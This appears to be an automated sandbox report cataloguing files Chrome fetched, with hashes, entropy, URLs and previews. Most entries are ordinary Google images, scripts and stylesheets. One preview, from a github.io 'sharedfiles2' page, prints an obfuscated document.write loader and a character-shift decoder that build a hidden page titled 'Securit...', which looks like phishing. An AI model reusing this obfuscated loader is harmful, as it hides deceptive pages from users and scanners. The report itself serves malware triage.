                                                                                                                                                                                                                                                                                          SHA-512:AEA4CC24AD434A4D5F6917B604D23BCF10E258A062A73C6D07CA1204A548DCA5F6F666AF3B2AFE08CC2682AF35E2B581F15F868E429F32F924242F92979E7427
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:"use strict";_F_installCss(".KL4X6e{background:#eee;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0}.TuA45b{opacity:.8}sentinel{}");.this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.Tz=function(a,b,c,d,e,f,g){var h=(0,_.Md)(a.ta);_.Dc(h);a=_.ne(a,h,c,b,2,f,!0);c=d!=null?d:new c;if(g&&(typeof e!=="number"||e<0||e>a.length))throw Error();e!=void 0?a.splice(e,g,c):a.push(c);(0,_.Bc)(c.ta)&2?(0,_.Yk)(a,8):(0,_.Yk)(a,16)};_.Vz=function(a){if(a instanceof _.Uz)return a.j;throw Error("w");};_.Wz=function(a){return new _.Uz(_.La,a[0].toLowerCase())};._.Xz=function(a,b,c,d){if(a.length===0)throw Error("w");a=a.map(function(f){return _.Vz(f)});var e=c.toLowerCase();if(a.every(function(f){return e.indexOf(f)!==0}))throw Error("ga`"+c);b.setAttribute(c,d)};_.bt.prototype.kc=_.ca(28,function(){return this.rb.length==0?null:new _.M(this.rb[0])});_.M.prototype.kc=_.ca(27,function(){return this});_.bt.prototype.Ia=_.ca(26,function(){retur
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5805
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9542006310437126
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:t9UzyN3uV9rFvd89BSK+b+n3P/WB64548U3zuH1pgD/ln5KCKH:/U2N+V9rj8DSK+bB5DKuH1oln5lq
                                                                                                                                                                                                                                                                                          MD5:D0656A971972F0807AB746BE522ADD05
                                                                                                                                                                                                                                                                                          SHA1:5DEB386A5C5481D9A4AE91E37E175A4E656AE245
                                                                                                                                                                                                                                                                                          SHA-256:C7B0BC63C6F5631DADD177E4EA287231713A0FF78A36213806ACC9BF760A4D4E
                                                                                                                                                                                                                                                                                          SHA-512:6DC7991439E91FF4901ACF4AB19FBFC83A9B9E5CB26ABB9987FA72937C84609407A894806B2E7802419C7A550C7F3075DCE0DA33063705ECC51F8F957A6D3D79
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/X7G-hd59XdxQgAu0Pg3jUf5LoAQQqSWjyKZSk0lvDBnRdboJB3f6rLhL9PSJLNy-ONa8vUba3hHAB3dmf35jpCuWWnabyN0BBDYYoXLZf1sMNPthFg=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....dIDATx..y....?.{o/4K./..(.`.d......8..I.8.3.e.%...8nAt.h.'.8O6......q.lFE.D.PD.f...Uu......t..[....y.~.....U.:...s.D..%J.)Rh.r..*...2M5$..16.5.. .D...E."&....'..=/u.WnK..@P....=Y.*=kf..Vc..F..F9*i..~80..:T..P...A.BU2j.RF....m.........1...<.W.]...S.."=M..:..H...&.z...?...*...H.[RE...*!i...k..".;.'b.6*o".5..$..>...0...9=A.:o.D\..:ew&..Q..w>v].........*....D....H..<.f..^..sF.....3OD......iIk..D..........`w.t.. .pyQ.[..H...)6.c:....F..#.....DE.......V.{...,.'V>.4.......g.8....fnK.c.FD)>a[#.~....=.%..!Y....-.{..._&.0..._V...R......=..2 .nu..7....]..K...PT..nE..mO..y..*lk..X......<.j1.*..%..z..k|.....a[#.U..1..Y.......C>.....w.ra.$...k..'....}yr.?..~....?.....c8.m......y.yj....|..=c.u.}{S...Pm.b...j}J..G>.....E*.^...... ..B.c>u..=..omj..["O...HGe+2.u...H8wn......m..H.6......x.,_.;.;..)z........%q..*$.qj...8....8=.y.. |sW..4.s;-.A....>Y..7Q..e.-:o........s...I..s.,_u.P.....`=c.4..+.%q;...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 293, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):214394
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995317950907745
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:pL5p9dy3HvguZH/fGRdPYd7UChwbUbexbwdbS5sP5er:FH9dyXvguZ/fMfwwbwNGQi
                                                                                                                                                                                                                                                                                          MD5:27CC1E3DFD83DF4EECCD96E3B8A21718
                                                                                                                                                                                                                                                                                          SHA1:0922E85980536F44B107135FBC3450C4FFA17574
                                                                                                                                                                                                                                                                                          SHA-256:1AA4E8B536EAA40010CC9FD5C12971EAF198AE431724247AE8B369A6A3C3EAC7
                                                                                                                                                                                                                                                                                          SHA-512:8DB4C77E36A724AFC3EA7C008CD0F86A1D9DA0940B052ABCD13A6945E5A29F9D0E6DD006D1B28CAC0EB75D0FF08374BA37CA599EAD37ACA0D3AFC115E4E30D41
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/bl7lc5NGrZQEr-cUfR-Gur5eANjLuMdaTUZP9yYxNneDJjHdzbRfd2Mfdx9L1ecDSXLbSj3kmNlkeg5pu83uUov2jx4xzHi2Akotz5lIKABiRlmJYFg?=w1440
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......%.......Z.....sBIT....|.d... .IDATx...i.f.u..;u.g{.~{...m...iq.H..M...I..(..... A.#1..1. ..8A..K..0.D."..,...E$..p...3..^fzzz}...}.{..nm.y...L?.u.N.:..O.:UW~......D@DPJ..%.."...>..3{.....2........hT......,- .1.b.4.......}..`.1&......_...)..]..k.4.4e<......8.Y.~.........1Q...I%shum6....Kt;f.I...qJ..4{....o...e[mF..}M.rE.v.=ns.....n....-..G*...$...(......_..{..qDxh............oo...a...u......R......Si..po...p...d.'..N...,..%pm..Z.............k~u..^.F......s..[...5.s.....^T.tOsq..^.W..|.D...g..r....M.1lPr....S.;.%>.R........&.s.U...W.Dc..mL,...q.....g].m.......P..?\..H.`......SM.z..Ibq|c.i@.....m.rD.z.}..)..L..;..k........0q.L..m..q.....L.....k.C.0&.M...VzSadF.=M.=...+...s....W..R...5.hLx....1...Q..I...^.$S.....w_.._b<.'..~.......,/cLM]..<cyy...v....Oy..).S.....|..O0.W.#..,.Z..". LFS...c.Ap.@2....4..F.3....%q..Z2..0M.19../.@......7.&....4..H.9..6L$.3...f....:D."1X..@&.....sz.6<`..h..c....3&.sc../.c.~'u;.B..v....S.7.l
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65502)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):229373
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.903845282697492
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:ca/5CPcra/5CPcya/5CPcKa/5CPcXa/5CPcRawCPcja/5CPc1awCPcfawCPcT:K
                                                                                                                                                                                                                                                                                          MD5:1557B3CC75E50D445001DFC48B41F047
                                                                                                                                                                                                                                                                                          SHA1:AA163BAF3FCA75F33470F7D869DE96FA60D477DA
                                                                                                                                                                                                                                                                                          SHA-256:15176EF6BEFEA37ED9F549DBDAE868DD943F25827F45491FD4D5BDA007F1D8B7
                                                                                                                                                                                                                                                                                          SHA-512:3CB08D063BDEBCB4C7AF87FFABBF0D3A5A2B643F3AB9E8ADEEAF7DF21195967F99732A792FBD45965C7A888221C43C2AC77FE17245627F9D5F4E50F0B042FEA2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/v26_0/glue-material.min.css
                                                                                                                                                                                                                                                                                          Preview:/* Glue Styles for Material v9 */..glue-switch+label,.glue-radio+label,.glue-checkbox+label{color:#3c4043;cursor:pointer}.glue-switch.mdc-switch--disabled+label,.glue-radio.mdc-radio--disabled+label,.glue-checkbox.mdc-checkbox--disabled+label{color:rgba(60,64,67,.38);cursor:default}.glue-text-field+.mdc-text-field-helper-line .mdc-text-field-helper-text,.glue-text-field+.mdc-text-field-helper-line .mdc-text-field-character-counter,.glue-select+.mdc-select-helper-text{font-family:"Google Sans Text",Arial,Helvetica,sans-serif;font-size:12px;letter-spacing:.2px}[lang=ja] .glue-text-field+.mdc-text-field-helper-line .mdc-text-field-helper-text,.glue-text-field+.mdc-text-field-helper-line [lang=ja] .mdc-text-field-helper-text,[lang=ja] .glue-text-field+.mdc-text-field-helper-line .mdc-text-field-character-counter,.glue-text-field+.mdc-text-field-helper-line [lang=ja] .mdc-text-field-character-counter,[lang=ja] .glue-select+.mdc-select-helper-text{font-family:"Google Sans Text","Noto Sans JP
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):181
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.052245007941961
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                                                          MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                                                          SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                                                          SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                                                          SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1029
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.702778935724778
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:/lVLIecDGAF3h28ysL5lqd26WsKZkZjAG28r5hgt72:9Vse+n28BFwnWx8iy
                                                                                                                                                                                                                                                                                          MD5:C4989F1B2A2A2C78188EE4704B9461F4
                                                                                                                                                                                                                                                                                          SHA1:5B1CDD9F61658A62A2B4D5D91F55A46B9593C2AC
                                                                                                                                                                                                                                                                                          SHA-256:8B4192D2F7725E78C9E4B57F348E7B92A5053E65776BA1AC103C5FD7FA57F45C
                                                                                                                                                                                                                                                                                          SHA-512:1BC0FE45954716223A0EE546BDE2F95E8CB59BCBE08B6AB0A706EF76FE0714BA6411C81309C94CC75F00406D8429CA96830B1A9FE2B2974053B38CA52F541B65
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/i/productlogos/google_search_round/v8/web-32dp/logo_google_search_round_color_1x_web_32dp.png
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....IDATx....p4Y.E{.r..-.mo..m.m.m..h.A..~/..z...T.8}nK*...$. .....J....8..r..9...$...{Qxv...'..9..g<;Va./..Qr. _*h.y...............D.Dp.4....e..A..X..f...L..O.x.S#.N.......L...r1........./^...S..U..H....$2.,....fY...b........?r.....h..gz.U......>+.....;.TI.....q......3.Z4......b.q1-E...#.G.....@a..;...x8......V......[5...!,!,.M.Z.0.....5.k..Y$..*......s@Op.'.h..Yn......1r......b(y...]..&.C?.5._....AD.. .....6vP.1..D.K.i.0.9`~.=.d.w...%_.x. ...._8`.s..p..~.3_...*.`..8.\.B......4..8U.,.|..S,:=.".......= j@.....f.{.a.I.0.N......D/.......y......av..L.A...5......{.. .h.L...?.V.....|J.r.0..Kd;..@.....)9.E..1.........(..9.....2.d...h.f-..v<.<}....r.'.P....*jm....-....K...v.AW.._.W..+ nA?D.r.8..V .Z....06........._.....tQ..K....Pu.A..Rn....t.dp......).....G.........@.K)/dY.E......C.}....a...UG..p.s..(.:v.. (.2.y....{..w....`_C3u....K.!...0M:j1a.c5....HM.....^.cDH....O.A...z.......o..W*I\..t9..3.."......w....|
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.845350936622435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:a3s5E3C:a3KE3C
                                                                                                                                                                                                                                                                                          MD5:169FD8A4A66188491593969BAD0F4EAB
                                                                                                                                                                                                                                                                                          SHA1:5DCF616EAED4D8DD3537549BFAF997E6726F6450
                                                                                                                                                                                                                                                                                          SHA-256:A0A1F98FCA203B8561519A06BACFDC50E4B3C4A5A71E740DA5B0875BD4FC00D6
                                                                                                                                                                                                                                                                                          SHA-512:9D4A767C5DF1CCBD92F4D19DF6A32079BC498727A4D9DB255A5C424925A589BCD3B858137B48DC07D4097A1AA329194CC2C60AA7CF3F322B7B81D9F24DCA05F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/config/2b.json?hl=en
                                                                                                                                                                                                                                                                                          Preview:{ "required": false }.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3727
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.926195838805319
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:yCOy3BuJexK6mMkPGleW2APedZyg4AgZi1jckYm7zMkYQrYlpbgAaAlCP0dmw1qy:9ODJegftIWHyOFMkYQElGY00owsdOwS
                                                                                                                                                                                                                                                                                          MD5:505B44CE71DF19C29E8EC9DD5DC4625B
                                                                                                                                                                                                                                                                                          SHA1:F582F2352C4AA480F0AFA8C957D54C49687D9F9F
                                                                                                                                                                                                                                                                                          SHA-256:D06F07FCBD95934239ED9A2391850F91CCB04BA60AF99672532E77D9B83462F3
                                                                                                                                                                                                                                                                                          SHA-512:DF758AC62C6C59039E2EA4A45A8F7A5B55A6116304A2E1D33D73329B10A4B7B3E79731B696AAA3FA6AEA2266A794B6180DA1B70164A2DA84478D2E220F425134
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/AGsg9hOAylBkWuFrfSgOt8psYWcr3b-vZcmIVk0ocwx7KAVSu--tg1ZIAUSL7nAbORTHI5eZaweHYVPMJu5ac8Xw7GP_WiCs1w60=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....FIDATx..i.\.u....uO..O.vE.Hb.e#...b0t#..v.Hv.e.M....).J)r.b..6..H.....F..]B=.A.!..'...ZL.....@.%43....h. ...7.}....=.t.>..=..{!"""""""""""""""""b"..6.2...)./...f..u/...c...&.t...q.+.....J....a..E..o^.s..Q%F..TEof5fl.-......ZqO.7S..z...68C.'.....,.@k.5.A.X.....w.2...[U.......w.o...s...t...............[,}..1........3...v.........-....O\.2<.5..o...+q.&........9.PZ.j...F8..!.G@...4$!U7.o....8...o.{..+9......O...+.....%.Q.p.v....#h.....j.*u.c..`.[.....>...r../....<.6...M:JWmE.....;c........~U.."..&/.,.....Ub...VY^s. {.-.............2. 1.....<&<..Y.\f.....C2.n.K..N.qY..r=.R\&9.w..g.....k.!Lmu7.Q...z....L.{.8#.....f.j+@m....b......R..D.J...........4.:..8..?..v....^...x.i.[.S.>.I..9".....S..$b...G]P.`.a......0..c)......|P;\..s.='.$L.o..J.M{.y*..7EZ!..V..)...S..p..[.. ..7.x.e.......K.-.q..H.B..a.(.i...v.E..D.X..*........Vk.P.n..?.3.G..2.8.7.W@.'..M-.........n<.e.H...e....NVo... `z.G....Mg.#.8q.+.z.M..i..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (10466), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10466
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.070656578186272
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:Zax7TRoWUDy0VK2N5fVgjsI4QkVH8Dig/zLo+5:gJwVTJuR4QkVH3g/z0G
                                                                                                                                                                                                                                                                                          MD5:7EE6708A8DA1095F149247EA48B0F0FA
                                                                                                                                                                                                                                                                                          SHA1:58D985926261B4474D9D118F82F4BAA06681EF08
                                                                                                                                                                                                                                                                                          SHA-256:F1EA3DB2C257376AE339E5BD8245CCC52BB008276E64991E6CBA8B6E01747DD4
                                                                                                                                                                                                                                                                                          SHA-512:8EF95502639A10010B2160BC98B9BE918DE8C1A49A4CC2395236A26F1ABBB9B84D0E57790C11D5A99846628E78772016EE68B4ECA42C01B6D5BB5582D9D41B61
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://sharedfiles2.github.io/feel1/
                                                                                                                                                                                                                                                                                          Preview:<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('*8H*76ITHY%5EUJ*75myrq*8J*5F*8Hmyrq*75qfsl*8I*77js*77*8J*5F*8Hmjfi*8J*5F*75*75*75*75*8Hrjyf*75hmfwxjy*8I*77ZYK2%3D*77*8J*5F*75*75*75*75*8Hrjyf*75sfrj*8I*77%7Bnj%7Cutwy*77*75htsyjsy*8I*77%7Cniym*8Iij%7Bnhj2%7Cniym*7H*75nsnynfq2xhfqj*8I635*77*8J*5F*75*75*75*75*8Hynyqj*8JXjhzwny
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3334
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924697987463917
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:81VEwxg6WwVURv82kMybe9S3UWzyD6pTMBVtIW:81VEGgBwVM3kDbx3UWz2gWVOW
                                                                                                                                                                                                                                                                                          MD5:9B7BC7C53D0E1D959C865833E5B20024
                                                                                                                                                                                                                                                                                          SHA1:E433E69959B3D070EAAABC0C802CB9EA8FBCEBDC
                                                                                                                                                                                                                                                                                          SHA-256:4A481E06DECADFFDE28C8C9A6637822F7D102127AC095F978C6F6B38ED1CAD91
                                                                                                                                                                                                                                                                                          SHA-512:C0ECEE682B2C33EFA45BE3B3A5A21C928533F110C0F89A8ABE5F59E1BFF87B99E31511727A6317F452DB2EA7830D0AC92C68F77DC33ED9CF12236FF931904210
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/32/06/e176164b46038c455f82a760407c/image-281.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8X..............ALPH......Em.!I.j...=..m.m.m.1.L...U....EWeF...g/#b....E}...v...?..}..1.. ...x..K[5B.m..b.....g...w.r0......l....V7?.yir..x..1...W.M.....9.dM?2..c.n.{.....3.!.5Bw]U....H..9[.<Uyn.DjF...zi./ ..6?_.C{..L2..p|.3yg....a;sC.W.o......*..z.!..8}..7.`.......D.C......J/..D.J...........@...;.k#.5D......1.8...cV....q....x]....a.6V....5.!...;..c.fm\.A........c....jQ8......G..<Dem...)&5..@.mh.G.c.q.,..h.!..n.E.E6.m..A<i.qP...e.......;..}.o..H.X...1H}`...A..G.M..#v....kt..P.(m.L......Q...Y.5..k...YS..|u..8.......q.?...u.=.O.......T....F...U.,.E...liG.5.e...+.F.......k+.S.m.F.o...pF.).{R4....F.p._.s.z9...4S..p.1A9..:..D=Z...J...X#..wDz...u.. ...~u.....A....HR.J'lp..yF....5..Z\...T.....v....E.h.".ti.";<R... ``Q...s6"X.5.....E..0.kx`$.......|0.m.A.......a..kd.#.s..?.N[.8[m...9..'....0...1...p.....B.3e..&....T....B~".>&8m....c....@....n.J$....A..%...s..iDl.wW...[....p....(8.A.:Q4!.^....w.......,.-sS.3...Y..C1........jY..0
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):817
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.381646783346233
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/79B/6Ts/G43jjRB4iS/4bSHOOO4u7zzzzzzzbgkokpAfdhXJ2/oi/3ypm353o:O/6+3xHNt7zzzzzzzbo5lj726m35gz3
                                                                                                                                                                                                                                                                                          MD5:8241731FF6D4C4B54D50DDB229ABD5AD
                                                                                                                                                                                                                                                                                          SHA1:732D211AA1407DF9DD3E68728D62A1F92286A716
                                                                                                                                                                                                                                                                                          SHA-256:D89908B7F4188864173BBDB3021BAF269468E9117BB0717CAA9823E4578961D0
                                                                                                                                                                                                                                                                                          SHA-512:AC847205DCE1EB6E0F9B21E935B10C2F4C939B0F1AD38D62C2DD9DAFE87AF4D4D6A0F9D79F30F1948D7D627136D2DFD90322955023818A1C42250202CF328AF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................sRGB.........gAMA......a.....IDATx...=N[A...cH"P.R*......l.%x!I.A.....(BKI..D..@F...5.g.3..#.s..wl...L^...V...,....,....,....,...>Y.....{|gg.'...6...|...M...7.........}..6...W.$z.>.?'.....+.'.O...U.....^.]>.'|...f...W..#.8..#...ef.[.j....+X....X....X....X....X\..,.K...:.E.N....~N..b..L....;.2.E....}..C)s_..G`q..G`q..G`q..G`q..G`q..G`q..G`q..G`q..G`q...}...9P..,....,....,.....|6O...t.....(...`.n..ism.v.W.q7.....I..N.'....K4q.....U.L.6..&n;.........^.....H`...=0q}......:.].\.>e.L\.F.&.o........A.......KR`..':0q...8w..u.:kh.*.~g...f.S...p....b"..t....?......N..A.....pbY.V.......W.J.j..#.....L..jG&p.5#...Z...P...n.td.;P22..(......L`grG&.C9#..\...X...vnld.w`Ld.wbhd.wdHdfW;.:..L.8.hq..G`q..G`q..G`q....w..7y^.....7.....IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3695
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.88804280702612
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:t9Gxmk27ifs6xJtIQoB3oUOOVjUh2Hi4ak5+ZcY1o/jSqJvNReAn4af0h2Trfolo:Kds6x0QkVjZnakMcmqj4afY2TrQLX85P
                                                                                                                                                                                                                                                                                          MD5:C87773A3095A6870E4842E5E07869466
                                                                                                                                                                                                                                                                                          SHA1:C51BF4EEE9A05F5EB0D41C53223E7B6F5A1CD39E
                                                                                                                                                                                                                                                                                          SHA-256:BBD8CA8AC70BCEED0F225E8F302C685A9297AC68C3518BCE9240312572081EC4
                                                                                                                                                                                                                                                                                          SHA-512:2C927189211F93C5C4E3FD7799FC56A8AC80B165EB38F2E57EEDAAF8E23D37518B8E82FD579E51503214DD189AF25A96BB3E0F3CE46948DB06BBAF3BDC44D91B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/kSVhJx6xNAhqot_OjnzSAp8kyKtL9nW65nqObijdjYcNfqDn4bLx-1g_1h4rz0maXRwJp6K4AEDCQi8dOg_tn_Y80R3NjNXbUN6Hag=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d....&IDATx..y.\E..?o.2.......Q!....$......c.r(Z.h...Pb...*....((q5....q..B,`...Q.>...H.%{.7...'E........Tmm..t.o......5$$$$$$$D....Ab...`2..y......Y't...C'.]............!.N..s.....sF.y%dSC.C#.]...y........P..4...@..../.].........q.U..5.2...:o..0ZF..vA..,...>.....{...NQ..1b...z.p#p.0Jq.e.1`..u.U\w..H........gX..7.{r*j.$.-.I.........\...'.].......Y..bD2..h..7....D...F.Y.A...i=.GD#.@WD..b..l....Fh.x....a.R....+.#b....}......|2j;...o.Fx!..W.(..........^.....P.....Fm..b-.].D.3...]88j...[.+^....Fm....../.V`...S@:jC.0=j...K.+......qcC..x!..........Q.....l....OQ.&V..R..x!V........^k>...^.....kg.F...Q.....l.....8.3.7.....Bl...A.....6.+.........q..#....D..].5.jA....Q. C..#."...:.<R.g#....|!.w.v..]..Q.!..Swas$..m....i.e.y+.....d......;...\f@E[.EU......x?{....Y..f.2.'.?R.=.....4...&.m.Y.].'...-.n.....>...`..Y`..3.f.:...<.!n#..2.$....p1.qk..H....{...E...k.R#./[.... f._...r=....Q.e..R0.I...[....|....9p9.....\.\o.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (9027), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):9027
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947824943141241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:GFmlLkHo/a1rOQEo/eKO1O/XozXo/5VoD9ScNOR7cibmxuWK6:GcNn/a1rB//eKO1OQM/0D97OdCxu4
                                                                                                                                                                                                                                                                                          MD5:8F51790BFFFCC31ED97977E0F694A3A6
                                                                                                                                                                                                                                                                                          SHA1:734B38A9909BB10C3F8C6ACDABAF90BE5B01223C
                                                                                                                                                                                                                                                                                          SHA-256:372DCB604072BE98F12E6B48ECF53AA4238767FB34CC47723EEB3FC5552A65D0
                                                                                                                                                                                                                                                                                          SHA-512:EFCCC6A6A96FE86D3F955CC8D10E51EAA8E8230ADA7E57B6DD1110FAFC39F511D71480A20FCE51A7633F947634BB637B023828672C11E268C20DE32D00D5E3F4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/cookienotificationbar.min.css
